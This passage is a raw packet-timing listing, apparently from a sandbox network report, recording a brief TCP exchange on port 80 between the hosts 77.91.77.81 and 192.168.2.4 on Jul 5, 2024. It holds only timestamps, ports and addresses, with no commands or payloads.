                                                                Jul 5, 2024 04:36:13.027756929 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.027776003 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.027793884 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.027803898 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.027815104 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.027825117 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.027825117 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.027841091 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.027852058 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.027868986 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.027904034 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.060370922 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.060424089 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.060688972 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.060699940 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.060709953 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.060719967 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.060725927 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.060735941 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.060744047 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.060749054 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.060760975 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.060770988 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.060777903 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.060786009 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.060796022 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.060807943 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.060810089 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.060821056 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.060842037 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.060867071 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.080843925 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.080909967 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.081134081 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.081150055 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.081161976 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.081171036 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.081181049 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.081182957 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.081197977 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.081207037 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.081211090 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.081221104 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.081238985 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.081248999 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.081249952 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.081249952 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.081257105 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.081264973 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.081271887 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.081278086 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.081290007 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.081300020 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.081309080 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.081311941 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.081315041 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.081327915 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.081334114 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.081335068 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.081341028 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.081351995 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.081355095 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.081392050 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.115516901 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.115526915 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.115537882 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.115571976 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.115581989 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.115587950 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.115593910 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.115597963 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.115612030 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.115628004 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.115658998 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.115669012 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.115679979 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.115726948 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.115745068 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.115751028 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.115756035 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.115767956 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.115778923 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.115818977 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.115818977 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.115859032 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.115863085 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.115874052 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.115886927 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.115897894 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.115910053 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.115912914 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.115921974 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.115936041 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.115957022 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.115977049 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.115983963 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116040945 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.116050005 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116060972 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116103888 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.116122961 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116125107 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.116133928 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116148949 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116158009 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116167068 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.116174936 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116187096 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116189957 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.116193056 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116204977 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116210938 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.116245985 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.116276979 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.116290092 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116301060 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116311073 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116317034 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116328955 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116342068 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.116375923 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.116415024 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116425037 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116435051 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116444111 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116456985 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116462946 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.116472006 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116489887 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116506100 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116513968 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.116516113 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116530895 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116535902 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.116542101 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116555929 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.116564035 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116575956 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.116578102 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116614103 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.116614103 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.116620064 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116631985 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116636038 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.116662979 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.116713047 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116722107 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116733074 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116753101 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116767883 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116771936 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.116780996 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116794109 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.116800070 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116813898 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116815090 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.116826057 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116838932 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116858959 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.116858959 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.116880894 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.116882086 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116894007 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116905928 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116915941 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116933107 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116934061 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.116944075 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116959095 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.116972923 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116985083 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.116996050 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.117017984 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.117058992 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.117058992 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.117069960 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.117080927 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.117093086 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.117105007 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.117120981 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.117121935 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.117161036 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.117518902 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.117530107 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.117541075 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.117568970 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.117602110 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.117614031 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.117624998 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.117634058 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.117644072 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.117662907 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.117693901 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.150298119 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.150335073 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.150345087 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.150357962 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.150391102 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.150413036 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.150423050 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.150433064 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.150444031 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.150449991 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.150471926 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.150480986 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.150491953 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.150495052 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.150506973 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.150515079 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.150536060 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.150546074 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.150551081 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.150554895 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.150573015 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.150576115 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.150615931 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.150650024 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.170819044 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.170844078 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.170855045 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.170865059 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.170881033 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.170905113 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.170912027 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.170927048 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.170945883 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.170953989 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.170958042 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.170990944 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.171020985 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.171029091 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.171041012 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.171050072 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.171061039 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.171076059 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.171082020 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.171093941 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.171099901 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.171135902 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.171169043 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.171181917 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.171192884 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.171200991 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.171219110 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.171230078 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.171237946 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.171250105 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.171252012 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.171260118 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.171271086 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.171307087 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.205298901 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.205312014 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.205322027 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.205368042 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.205378056 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.205382109 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.205389977 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.205403090 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.205414057 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.205427885 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.205461979 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.205461979 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.205513954 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.205562115 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.205566883 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.205579996 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.205610991 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.205641985 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.205655098 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.205665112 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.205674887 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.205683947 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.205702066 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.205729008 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.205738068 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.205748081 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.205749989 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.205785036 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.205916882 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.205928087 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.205939054 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.205949068 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.205961943 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.205960989 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.205986023 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.206015110 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.206053019 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.206063986 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.206113100 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.206119061 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.206130028 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.206140041 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.206165075 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.206181049 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.206187010 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.206191063 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.206202030 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.206212997 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.206223965 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.206224918 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.206253052 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.206263065 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.206264019 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.206274986 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.206285000 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.206285954 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.206317902 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.206363916 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.206384897 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.206403971 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.206414938 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.206432104 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.206433058 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.206446886 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.206456900 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.206460953 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.206460953 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.206468105 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.206479073 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.206489086 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.206526041 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.206537008 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.206547022 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.206557989 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.206568956 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.206578016 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.206582069 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.206618071 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.206621885 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.206634045 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.206645966 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.206661940 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.206661940 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.206670046 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.206686974 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.206688881 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.206701040 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.206713915 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.206722975 CEST804973177.91.77.81192.168.2.4
